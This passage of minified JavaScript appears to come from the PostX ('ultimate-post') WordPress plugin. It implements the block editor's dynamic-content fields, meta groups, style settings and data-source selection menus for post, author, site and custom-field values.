c=""!==e.dataSrc&&l(i.$6).hasFinishedResolution(n,s);return{text:(0,o.createElement)(o.Fragment,null,e.beforeText&&(0,o.createElement)("p",{className:"ultp-dynamic-content-field-before"},e.beforeText),(0,o.createElement)("p",{className:"ultp-dynamic-content-field-dc"},a),e.afterText&&(0,o.createElement)("p",{className:"ultp-dynamic-content-field-after"},e.afterText)),hasResolved:c}}));s((()=>{g&&p(c,d)}),[g]);const{elementRef:y,isSelected:b,setIsSelected:v}=(0,n.Z)();return(0,o.createElement)("div",{ref:y,className:`ultp-dynamic-content-field-common ultp-dynamic-content-field-${e.id} ultp-component-simple ${b?"ultp-component-selected":""}`,onClick:e=>{v(!0),l(e,"dc_field")}},""===e.dataSrc?(0,o.createElement)("span",{className:"ultp-dynamic-content-field-dc"},__("Custom Field","ultimate-post")):g?(0,o.createElement)(o.Fragment,null,e.icon&&(0,o.createElement)("span",{className:"ultp-dynamic-content-field-icon"},a.ZP[e.icon]),m):(0,o.createElement)("span",{className:"ultp-dynamic-content-field-dc"},__("Loading…","ultimate-post")))}},39349:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(2376),i=l(74971),n=l(12641);function r({idx:e,postId:t,fields:l,settingsOnClick:r,selectedDC:s,setSelectedDc:p,dcFields:c,setAttributes:u}){const d=l[e],{elementRef:m,isSelected:g,setIsSelected:y}=(0,a.Z)();return d?(0,o.createElement)("div",{ref:m,className:"ultp-dynamic-content-group-common ultp-dynamic-content-group-"+l[e].id,onClick:t=>{y(!0),p(e),r(t,"dc_group")}},l[e]?.fields.map(((l,a)=>(0,o.createElement)(n.Z,{key:a,idx:a,postId:t,groupIdx:e,field:l,resetOnboarding:(e,t)=>{s===`${e},${t},1`&&(p(""),r(null,""),wp.data.dispatch("core/block-editor").clearSelectedBlock())},settingsOnClick:t=>{p(`${e},${a}`),r(t,"dc_field")}}))),g&&(0,o.createElement)("button",{type:"button",className:"components-button block-editor-inserter__toggle has-icon","aria-label":"Add a new Meta Field",onClick:t=>{t.stopPropagation();const l=[...c];l[e].fields.push((0,i.rB)()),u({dcFields:l})}},(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",width:18,height:24,"aria-hidden":"true",focusable:"false",fill:"white"},(0,o.createElement)("path",{d:"M11 12.5V17.5H12.5V12.5H17.5V11H12.5V6H11V11H6V12.5H11Z"})))):null}},46558:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({moveUp:e,moveDown:t,idx:l,subIdx:a=null,mode:i="vertical"}){return(0,o.createElement)("div",{className:"ultp-toolbar-sort"+("horizontal"===i?" ultp-toolbar-sort-horizontal":"")},(0,o.createElement)("span",{title:"Move Element Up",role:"button","aria-label":"Move element up",className:"ultp-toolbar-sort-btn",onClick:()=>t(l,a)},(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg","aria-hidden":"true",focusable:"false"},(0,o.createElement)("path",{d:"M6.5 12.4L12 8l5.5 4.4-.9 1.2L12 10l-4.5 3.6-1-1.2z"}))),(0,o.createElement)("span",{title:"Move Element Down",role:"button","aria-label":"Move element down",className:"ultp-toolbar-sort-btn",onClick:()=>e(l,a)},(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg","aria-hidden":"true",focusable:"false"},(0,o.createElement)("path",{d:"M17.5 11.6L12 16l-5.5-4.4.9-1.2L12 14l4.5-3.6 1 1.2z"}))))}l(66584)},51579:(e,t,l)=>{"use strict";function o(e={}){const{defColor:t=null}=e;return{dcEnabled:{type:"boolean",default:!1},dcFields:{type:"array",default:[]},dcGroupStyles:{type:"object",fields:{dcGAlign:{type:"string",default:"",style:[{depends:[{key:"dcGInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { justify-content:{{dcGAlign}}; flex-direction:row; }"},{depends:[{key:"dcGInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { align-items:{{dcGAlign}}; flex-direction:column; }"}]},dcGInline:{type:"boolean",default:!0},dcGSpacing:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { gap:{{dcGSpacing}}; }"}]},dcGSpacingTop:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { padding-top:{{dcGSpacingTop}}; }"}]},dcGSpacingBottom:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-group-{{dcID}} { padding-bottom:{{dcGSpacingBottom}}; }"}]}},default:{default:{dcGAlign:"flex-start",dcGInline:!0,dcGSpacing:{lg:"10",ulg:"px"},dcGSpacingTop:{lg:"5",ulg:"px"},dcGSpacingBottom:{lg:"5",ulg:"px"}}}},dcFieldStyles:{type:"object",fields:{dcFTypo:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-dc"}]},dcFColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-dc { color:{{dcFColor}}; }"}]},dcFSpacing:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-dc { margin-inline:{{dcFSpacing}}px; }"}]},dcFColorHover:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-dc:hover { color:{{dcFColorHover}}; }"}]},dcFBeforeTypo:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-before"}]},dcFBeforeColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-before { color:{{dcFBeforeColor}}; }"}]},dcFBeforeColorHover:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-before:hover { color:{{dcFBeforeColorHover}}; }"}]},dcBeforeSpacing:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-before { margin-right:{{dcBeforeSpacing}}px; }"}]},dcFAfterTypo:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-after"}]},dcFAfterColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-after { color:{{dcFAfterColor}}; }"}]},dcFAfterColorHover:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-after:hover { color:{{dcFAfterColorHover}}; }"}]},dcAfterSpacing:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-after { margin-left:{{dcAfterSpacing}}px; }"}]},dcFIconSize:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-icon svg { width:{{dcFIconSize}}px; height:auto; }"}]},dcFIconColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-icon svg { color: {{dcFIconColor}};  }"}]},dcFIconColorHover:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-dynamic-content-field-{{dcID}} .ultp-dynamic-content-field-icon:hover svg { color: {{dcFIconColorHover}};  }"}]}},default:{default:{dcFTypo:{openTypography:1,size:{lg:"12",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"300"},dcFColor:t||"var(--postx_preset_Contrast_1_color)",dcFColorHover:t||"var(--postx_preset_Primary_color)",dcFSpacing:"0",dcFBeforeTypo:{openTypography:1,size:{lg:"12",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"300"},dcFBeforeColor:t||"var(--postx_preset_Contrast_1_color)",dcFBeforeColorHover:t||"var(--postx_preset_Primary_color)",dcFAfterTypo:{openTypography:1,size:{lg:"12",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"300"},dcFAfterColor:t||"var(--postx_preset_Contrast_1_color)",dcFAfterColorHover:t||"var(--postx_preset_Primary_color)",dcFIconSize:"11",dcFIconColor:t||"var(--postx_preset_Contrast_1_color)",dcFIconColorHover:t||"var(--postx_preset_Primary_color)"}}}}}l.d(t,{b:()=>o})},74971:(e,t,l)=>{"use strict";l.d(t,{ZP:()=>_,rB:()=>T,sN:()=>x});var o=l(67294),a=(l(93332),l(30319)),i=l(53049),n=l(41557),r=l(22465);const{applyFormat:s,insert:p,removeFormat:c}=wp.richText,{__}=wp.i18n,{useState:u}=wp.element,{BlockControls:d}=wp.blockEditor,{useSelect:m}=wp.data,{Dropdown:g,ToolbarButton:y,ToolbarGroup:b,SelectControl:v,Button:h,ToggleControl:f,PanelBody:k,__experimentalNumberControl:w}=wp.components,x={dataSrc:"",postType:"",postId:"",contentSrc:"",linkEnabled:!1,linkSrc:"",beforeText:"",afterText:"",iconType:"",icon:"",fallback:"",maxCharLen:""};function T(){return{...x,id:(new Date).getTime()}}function _({isActive:e,headingBlock:t,richTextProps:l={},type:a="field",attrKey:n="",config:r=null}){const s=()=>(0,o.createElement)(g,{contentClassName:"ultp-dynamic-content-wrapper",defaultOpen:r?.isOnboarding,renderToggle:({onToggle:t,isOpen:l})=>(e&&!l&&t(),"field"===a?(0,o.createElement)("div",{onClick:e=>{e.stopPropagation(),e.preventDefault(),t()},className:"ultp-dc-field-dropdown"},(0,o.createElement)("span",{className:"ultp-dc-field-dropdown dashicons dashicons-database-add"})):"heading"===a?(0,o.createElement)("span",null,(0,o.createElement)(y,{label:__("Dynamic Content","ultimate-post"),icon:(0,o.createElement)("span",{className:"dashicons dashicons-database-add"}),onClick:()=>t(),isActive:l})):"toolbar"===a?(0,o.createElement)(y,{label:__("Meta Field Settings","ultimate-post"),onClick:()=>t(),icon:i.HU}):void 0),renderContent:()=>(0,o.createElement)("div",{className:"ultp-dynamic-content-dropdown"},(0,o.createElement)(E,{richTextProps:l,headingBlock:t,type:a,attrKey:n,config:r}))});return"field"===a||"toolbar"===a?s():"heading"===a?(0,o.createElement)(o.Fragment,null,(0,o.createElement)(d,null,(0,o.createElement)(b,null,s()))):void 0}function C(e,t){const{updateBlockAttributes:l}=wp.data.dispatch("core/block-editor");l(e,t)}function E({richTextProps:e,headingBlock:t,type:l,attrKey:i,config:d}){var g;const[y,b]=u("toolbar"===l?t.attributes.dcFields[d.groupIdx].fields[d.fieldIdx]:i?t.attributes.dc[i]:t.attributes.dc),[T,_]=u(!1),E=m((e=>y.postId||e("core/editor").getCurrentPostId()),[y.postId]),S=async o=>{_(!0);try{if(o)if("toolbar"===l){const e=[...t.attributes.dcFields];e[d.groupIdx].fields[d.fieldIdx]=y,C(t.clientId,{dcEnabled:!0,dcFields:e})}else{let o="",n="",c=[];if(y.contentSrc.startsWith(r.AF)&&(o=await wp.data.resolveSelect(a.$6).getPostInfo(E,y.contentSrc.slice(r.AF.length)),n="getPostInfo",c=[E,y.contentSrc.slice(r.AF.length)]),y.contentSrc.startsWith(r.El)&&(o=await wp.data.resolveSelect(a.$6).getAuthorInfo(E,y.contentSrc.slice(r.El.length)),n="getAuthorInfo",c=[E,y.contentSrc.slice(r.El.length)]),(y.contentSrc.startsWith(r.BQ)||y.contentSrc.startsWith(r._P)||y.contentSrc.startsWith(r.Ix)||y.contentSrc.startsWith(r.uy))&&(o=await wp.data.resolveSelect(a.$6).getCFValue(E,y.contentSrc),n="getCFValue",c=[E,y.contentSrc]),y.dataSrc.startsWith(r.Bj)&&(o=await wp.data.resolveSelect(a.$6).getSiteInfo(y.dataSrc.slice(r.Bj.length)),n="getSiteInfo",c=[y.dataSrc.slice(r.Bj.length)]),y.contentSrc.startsWith(r.uZ)&&(o=await wp.data.resolveSelect(a.$6).getLink(E,y.contentSrc),n="getLink",c=[E,y.contentSrc]),y.linkEnabled&&y.linkSrc&&d?.linkOnly&&(o=await wp.data.resolveSelect(a.$6).getLink(E,y.linkSrc),n="getLink",c=[E,y.linkSrc]),(0,a.gH)(n,c),["string","number","boolean","bigint"].includes(typeof o)?(o=String(o),y.maxCharLen&&(o=o.split(" ").slice(0,+y.maxCharLen).join(" "))):(console.log("Invalid Data Type: ",o),o=null),o||(o=y.fallback||"[EMPTY]"),o=y.beforeText+o+y.afterText,"heading"===l&&(C(t.clientId,{dcEnabled:!0,dc:y}),function(e,t,l){const{isActive:o,value:a,onChange:i,onFocus:n}=t,{start:r,end:c}=function(e){let t,l;for(let l=0;l<e.length;l++)if(e[l]&&e[l].some((e=>"ultimate-post/dynamic-content"===e.type))){t=l;break}for(let t=e.length;t>=0;t--)if(e[t]&&e[t].some((e=>"ultimate-post/dynamic-content"===e.type))){l=t;break}return{start:t,end:l}}(a.formats),u=null!=r?r:a.start,d=p(a,e,u,c?c+1:a.end),m=u+e.length;i(s(d,{type:"ultimate-post/dynamic-content",title:__("Dynamic Content","ultimate-post")},u,m)),C(l.clientId,{dcText:{start:u,end:m}}),wp.data.dispatch("core/block-editor").selectBlock()}(o,e,t)),"ultimate-post/image"===t.name){const e={dc:{...t.attributes.dc,[i]:y},dcEnabled:{...t.attributes.dcEnabled,[i]:!0}};["imageUpload","darkImage"].includes(i)?e[i]={...t.attributes[i],url:o}:e[i]=o,C(t.clientId,e)}}else{if("heading"===l&&(C(t.clientId,{dcEnabled:!1,dc:x}),function(e){const{value:t,onChange:l}=e;l(c(t,"ultimate-post/dynamic-content")),wp.data.dispatch("core/block-editor").selectBlock()}(e)),"field"===l&&"ultimate-post/image"===t.name){const e={dc:{...t.attributes.dc,[i]:x},dcEnabled:{...t.attributes.dcEnabled,[i]:!1}};["imageUpload","darkImage"].includes(i)?e[i]={...t.attributes[i],url:""}:e[i]="",C(t.clientId,e)}"toolbar"===l&&C(t.clientId,{dcEnabled:!1}),b((e=>({...e,...x})))}}catch(e){console.log(e)}finally{_(!1)}};if("heading"===l&&!e.isActive&&t.attributes.dcEnabled)return(0,o.createElement)("div",{className:"ultp-dynamic-content-empty"},__("This block only supports 1 Dynamic Data Binding.","ultimate-post"));const P="heading"===l&&e.isActive&&t.attributes.dcEnabled||"field"===l&&(i?t.attributes.dcEnabled[i]:t.attributes.dcEnabled);let L=!1;return((["current_post","post_type"].includes(y.dataSrc)&&!d?.linkOnly?""===y.contentSrc:""===y.dataSrc)||(d?.linkOnly||!d?.disableLink&&y.linkEnabled)&&""===y.linkSrc)&&(L=!0),(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-dynamic-content-fields"},(0,o.createElement)(v,{__nextHasNoMarginBottom:!0,labelPosition:"side",label:__("Data Source","ultimate-post"),value:y.dataSrc,onChange:e=>{b((t=>({...t,contentSrc:"",searchValue:[],postId:"",postType:"",dataSrc:e})))}},(0,o.createElement)(r.yN,{config:d,type:l})),"post_type"===y.dataSrc&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)(v,{__nextHasNoMarginBottom:!0,labelPosition:"side",label:__("Select Post Type","ultimate-post"),value:y.postType,onChange:e=>{b((t=>({...t,postId:"",searchValue:[],contentSrc:"",linkSrc:"",postType:e})))}},(0,o.createElement)(r.Bb,null)),""!==y.postType&&(0,o.createElement)(r.o3,{opts:y,setOpts:b})),("current_post"===y.dataSrc||"post_type"===y.dataSrc&&""!==y.postType&&""!==y.postId)&&(0,o.createElement)(o.Fragment,null,!d?.linkOnly&&(0,o.createElement)(r.G5,{opts:y,setOpts:b,type:null!==(g=d?.fieldType)&&void 0!==g?g:"text",req:function(e){const o={};o.post_type="toolbar"===l?"post_type"===y.dataSrc?y.postType:t.attributes.queryType:"current_post"===y.dataSrc?wp.data.select("core/editor").getCurrentPostType():y.postType;const a=null!==(e=d?.fieldType)&&void 0!==e?e:"text";return o.acf_field_type=a,("toolbar"!==l||"toolbar"===l&&"post_type"===y.dataSrc)&&(o.post_id=E),o}()})),!d?.disableLink&&""!==y.dataSrc&&(0,o.createElement)(o.Fragment,null,!d?.linkOnly&&(0,o.createElement)(f,{__nextHasNoMarginBottom:!0,checked:y.linkEnabled,label:__("Enable Link","ultimate-post"),onChange:e=>b((t=>({...t,linkEnabled:e,linkSrc:""})))}),(y.linkEnabled||d?.linkOnly)&&(0,o.createElement)(r.jk,{opts:y,setOpts:b,req:function(){const e={};return e.post_type="toolbar"===l?t.attributes.queryType:"current_post"===y.dataSrc?wp.data.select("core/editor").getCurrentPostType():y.postType,e.acf_field_type="url","toolbar"!==l&&(e.post_id=E),e}()})),!d?.disableAdv&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)(k,{title:__("Advanced","ultimate-post"),initialOpen:!1},(0,o.createElement)(r.nv,{value:y.beforeText,onChange:e=>{b((t=>({...t,beforeText:e})))},label:__("Before Text","ultimate-post")}),(0,o.createElement)(r.nv,{value:y.afterText,onChange:e=>{b((t=>({...t,afterText:e})))},label:__("After Text","ultimate-post")}),(0,o.createElement)(r.nv,{value:y.fallback,onChange:e=>{b((t=>({...t,fallback:e})))},label:__("Fallback","ultimate-post")}),d?.icon&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-dc-icon-control"},(0,o.createElement)(n.Z,{value:y.icon,label:__("Icon","ultimate-post"),isSocial:!1,inline:!1,dynamicClass:"",onChange:e=>b((t=>({...t,icon:e})))}))),(0,o.createElement)(w,{min:1,labelPosition:"side",value:y.maxCharLen,onChange:e=>{b((t=>({...t,maxCharLen:String(e)})))},label:__("Max Length","ultimate-post")}))),(0,o.createElement)(h,{className:"ultp-dynamic-content-dropdown-button",variant:"primary",onClick:()=>S(!0),isBusy:T,disabled:L},__("Apply","ultimate-post")),P&&(0,o.createElement)(h,{style:{marginTop:"24px"},isDestructive:!0,className:"ultp-dynamic-content-dropdown-button",variant:"secondary",onClick:()=>S(!1),isBusy:T},__("Reset","ultimate-post"))),!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-dyanmic-content-pro"},(0,o.createElement)("span",null,__("Get ACF Integration & Meta Box Access","ultimate-post")),(0,o.createElement)("a",{href:r.rj,target:"_blank",className:"ultp-dyanmic-content-pro-link",rel:"noreferrer"},(0,o.createElement)("span",null,__("Upgrade to PRO","ultimate-post")),(0,o.createElement)("svg",{width:14,height:14,viewBox:"0 0 14 14",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M6.08594 0.707031H13.293V7.91406L11.5 7V4.22266L6.47266 9.25L5.20703 7.98438L10.6562 2.5H7L6.08594 0.707031ZM8.79297 11.5V8.79297L10.5859 7V13.293H0.707031V3.41406H7.91406L6.08594 5.20703H2.5V11.5H8.79297Z"})))))}},69735:(e,t,l)=>{"use strict";l.d(t,{Ic:()=>c,KF:()=>u,dh:()=>d,o6:()=>m});var o=l(67294),a=l(74971);const{__}=wp.i18n,{useSelect:i}=wp.data,{registerFormatType:n}=wp.richText,r=__("Dynamic Content","ultimate-post"),s=["ultimate-post/heading","ultimate-post/list","ultimate-post/button"],p=(e,t,l)=>(e.splice(l,0,e.splice(t,1)[0]),e),c=e=>{const{attributes:t,setAttributes:l,setSelectedDc:o,selectedDC:i,layoutContext:n}=e,{dcFields:r}=t;return{moveMetaGroupUp:e=>{const t=Math.min(...[n.slice(0,e).reverse().findIndex((e=>e)),r.slice(0,e).reverse().findIndex((e=>e))].filter((e=>e>=0))),a=r.length,i=e-(t+1);if(i>=0&&i<a){const t=[...r];p(t,e,i),l({dcFields:t}),o(i)}},moveMetaGroupDown:e=>{const t=Math.min(...[n.slice(e,n.length).findIndex((e=>e)),r.slice(e+1,r.length).findIndex((e=>e))].filter((e=>e>=0))),a=r.length,i=e+t+1;if(i>=0&&i<a){const t=[...r];p(t,e,i),l({dcFields:t}),o(i)}},removeMetaGroup:e=>{if(Number.isInteger(e)){const t=[...r];t[e]=null,l({dcFields:t}),o(""),wp.data.dispatch("core/block-editor").clearSelectedBlock()}},addMeta:e=>{if(Number.isInteger(e)){const t=[...r];t[e].fields.push((0,a.rB)()),l({dcFields:t})}},removeMeta:(e,t)=>{if(Number.isInteger(e)&&Number.isInteger(t)){const a=[...r];a[e].fields.splice(t,1),0===a[e].fields.length&&(a[e]=null),l({dcFields:a}),o(""),wp.data.dispatch("core/block-editor").clearSelectedBlock()}},moveMetaUp:(e,t)=>{if(Number.isInteger(e)&&Number.isInteger(t)&&t>0){const a=[...r];p(a[e].fields,t,t-1),l({dcFields:a}),o(`${e},${t-1}`)}},moveMetaDown:(e,t)=>{if(Number.isInteger(e)&&Number.isInteger(t)){const a=[...r];t<a[e].fields.length-1&&(p(a[e].fields,t,t+1),l({dcFields:a}),o(`${e},${t+1}`))}}}},u={dc:{type:"object",default:a.sN},dcEnabled:{type:"boolean",default:!1}},d={dc:{type:"object",default:{imageUpload:a.sN,darkImage:a.sN,imgLink:a.sN,btnLink:a.sN}},dcEnabled:{type:"object",default:{imageUpload:!1,darkImage:!1,imgLink:!1,btnLink:!1}}};function m(){return"true"===ultp_data?.settings?.ultp_dynamic_content&&wp.data.select("core/editor")}m()&&n("ultimate-post/dynamic-content",{title:r,tagName:"span",className:"ultp-richtext-dynamic-content",edit(e){const{isActive:t,value:l}=e,n=i((e=>e("core/block-editor").getSelectedBlock()),[]);return n&&!s.includes(n.name)?null:(0,o.createElement)(a.ZP,{isActive:t,richTextProps:e,headingBlock:n,type:"heading"})}})},22465:(e,t,l)=>{"use strict";l.d(t,{AF:()=>y,BQ:()=>d,Bb:()=>x,Bj:()=>v,El:()=>b,G5:()=>S,Ix:()=>m,_P:()=>u,jk:()=>P,nv:()=>k,o3:()=>T,rj:()=>f,uZ:()=>h,uy:()=>g,yN:()=>w});var o=l(87462),a=l(67294),i=l(30319),n=l(68073),r=l(22217),s=l(83100);const{__}=wp.i18n,{useSelect:p}=wp.data,{TextControl:c}=wp.components,u="cmeta_",d="acf_",m="mb_",g="pods_",y="post_",b="a_",v="site_",h="link_",f=(0,s.Z)(null,"dc",ultp_data.affiliate_id);function k(e){return(0,a.createElement)("div",{className:"ultp-dynamic-content-textfield"},(0,a.createElement)("label",null,e.label),(0,a.createElement)(c,(0,o.Z)({},e,{label:void 0,__nextHasNoMarginBottom:!0})))}function w({config:e,type:t}){return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("option",{value:""},__("None","ultimate-post")),(0,a.createElement)("option",{value:"current_post"},__("Current Post","ultimate-post")),(0,a.createElement)("option",{value:"post_type"},__("Post Type","ultimate-post")),!e?.linkOnly&&"image"!==e?.fieldType&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("optgroup",{label:__("Archive","ultimate-post")},(0,a.createElement)("option",{value:v+"arc_desc"},__("Archive Description","ultimate-post")),(0,a.createElement)("option",{value:v+"arc_title"},__("Archive Title","ultimate-post"))),(0,a.createElement)("optgroup",{label:__("Site","ultimate-post")},(0,a.createElement)("option",{value:v+"tagline"},__("Site Tagline","ultimate-post")),(0,a.createElement)("option",{value:v+"title"},__("Site Title","ultimate-post")))))}function x(){const e=p((e=>e(i.$6).getPostTypes())),t=p((e=>e(i.$6).hasFinishedResolution("getPostTypes")));return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("option",{value:"",disabled:!0},__("Choose","ultimate-post")),t?e?.length?e?.map((e=>(0,a.createElement)("option",{key:e.value,value:e.value},e.label))):(0,a.createElement)("option",{value:"no-data",disabled:!0},__("No Post Types Found","ultimate-post")):(0,a.createElement)("option",{value:"loading",disabled:!0},__("Loading…","ultimate-post")))}function T({opts:e,setOpts:t}){var l;return(0,a.createElement)(n.Z,{label:__("Select Post","ultimate-post"),value:null!==(l=e?.searchValue)&&void 0!==l?l:[],search:"postExclude",single:!0,condition:e.postType,noIdInTitle:!0,onChange:e=>{t((t=>({...t,contentSrc:"",postId:void 0!==e[0]?e[0].value:"",searchValue:e})))}})}const _=[{label:__("Post Title","ultimate-post"),value:y+"title"},{label:__("Post Excerpt","ultimate-post"),value:y+"excerpt"},{label:__("Post Date","ultimate-post"),value:y+"date"},{label:__("Post Id","ultimate-post"),value:y+"id"},{label:__("Post Number of Comments","ultimate-post"),value:y+"comments"}],C=[{label:__("Name","ultimate-post"),value:b+"display_name"},{label:__("First Name","ultimate-post"),value:b+"first_name"},{label:__("Last Name","ultimate-post"),value:b+"last_name"},{label:__("Nickname","ultimate-post"),value:b+"nickname"},{label:__("Bio","ultimate-post"),value:b+"description"},{label:__("Email","ultimate-post"),value:b+"email"},{label:__("Website","ultimate-post"),value:b+"url"}],E=[{label:__("Post Feature Image","ultimate-post"),value:h+"post_featured_image"},{label:__("Author Profile Image","ultimate-post"),value:h+"a_profile"}];function S({req:e,type:t,opts:l,setOpts:o}){const{options:{acfFields:n,cMetaFields:s,mbFields:c,podsFields:y},error:b,hasResolved:v}=p((t=>t(i.$6).getCustomFields(e)),[e]),h=[{value:"",label:__("Choose","ultimate-post")},{value:"",label:__("Post","ultimate-post"),isHeader:!0}];return("image"===t?E:_).map((e=>{h.push({value:e.value,label:e.label,isChild:!0})})),h.push({value:"",label:__("Post Meta","ultimate-post"),isHeader:!0}),v?s?.length?s?.map((e=>{h.push({value:u+e.value,label:e.label,isChild:!0})})):h.push({value:"no-data",label:__("No Post Meta Found","ultimate-post"),isChild:!0,disabled:!0}):h.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,disabled:!0}),h.push({value:"",label:__("ACF","ultimate-post"),isHeader:!0,pro:!0}),v?n?.length?n?.map((e=>{h.push({value:d+e.value,label:e.label,isChild:!0,pro:!0})})):h.push({value:"no-data",label:__("No ACF Data Found","ultimate-post"),isChild:!0,disabled:!0,pro:!0}):h.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,disabled:!0,pro:!0}),h.push({value:"",label:__("Meta Box","ultimate-post"),isHeader:!0,pro:!0}),v?c?.length?c?.map((e=>{h.push({value:m+e.value,label:e.label,isChild:!0,pro:!0})})):h.push({value:"no-data",label:__("No Meta Box Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):h.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),h.push({value:"",label:__("Pods","ultimate-post"),isHeader:!0,pro:!0}),v?y?.length?y?.map((e=>{h.push({value:g+e.value,label:e.label,isChild:!0,pro:!0})})):h.push({value:"no-data",label:__("No Pods Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):h.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),h.push({value:"",label:__("Author","ultimate-post"),isHeader:!0}),"image"!==t&&C.map((e=>{h.push({value:e.value,label:e.label,isChild:!0})})),(0,a.createElement)(r.Z,{beside:!0,label:__("Content Source","ultimate-post"),value:l.contentSrc,onChange:e=>{o((t=>({...t,contentSrc:e})))},options:h,responsive:!1,proLink:f})}function P({req:e,opts:t,setOpts:l}){const{options:{acfFields:o,cMetaFields:n,mbFields:s,podsFields:c},error:y,hasResolved:b}=p((t=>t(i.$6).getCustomFields(e)),[e]),v=[{value:"",label:__("None","ultimate-post")},{value:"",label:__("Post","ultimate-post"),isHeader:!0},{value:h+"post_permalink",label:__("Post Permalink","ultimate-post"),isChild:!0},{value:h+"post_permalink",label:__("Post Comments","ultimate-post"),isChild:!0},{value:"",label:__("Post Meta","ultimate-post"),isHeader:!0}];return b?n?.length?n?.map((e=>{v.push({value:u+e.value,label:e.label,isChild:!0})})):v.push({value:"no-data",label:__("No Post Meta Found","ultimate-post"),isChild:!0,disabled:!0}):v.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,disabled:!0}),v.push({value:"",label:__("ACF","ultimate-post"),isHeader:!0,pro:!0}),b?o?.length?o?.map((e=>{v.push({value:d+e.value,label:e.label,isChild:!0,pro:!0})})):v.push({value:"no-data",label:__("No ACF Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):v.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),v.push({value:"",label:__("Meta Box","ultimate-post"),isHeader:!0,pro:!0}),b?s?.length?s?.map((e=>{v.push({value:m+e.value,label:e.label,isChild:!0,pro:!0})})):v.push({value:"no-data",label:__("No Meta Box Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):v.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),v.push({value:"",label:__("Pods","ultimate-post"),isHeader:!0,pro:!0}),b?c?.length?c?.map((e=>{v.push({value:g+e.value,label:e.label,isChild:!0,pro:!0})})):v.push({value:"no-data",label:__("No Pods Data Found","ultimate-post"),isChild:!0,pro:!0,disabled:!0}):v.push({value:"loading",label:__("Loading…","ultimate-post"),isChild:!0,pro:!0,disabled:!0}),v.push({value:"",label:__("Author","ultimate-post"),isHeader:!0},{value:h+"a_profile",label:__("Avatar (Profile URL)","ultimate-post"),isChild:!0},{value:h+"a_arc",label:__("Author Archive URL","ultimate-post"),isChild:!0},{value:h+"a_page",label:__("Author Page URL","ultimate-post"),isChild:!0}),(0,a.createElement)(r.Z,{beside:!0,label:__("Link Source","ultimate-post"),value:t.linkSrc,onChange:e=>{l((t=>({...t,linkEnabled:!0,linkSrc:e})))},options:v,responsive:!1,proLink:f})}},48054:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(56834);const i={left:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M2.25 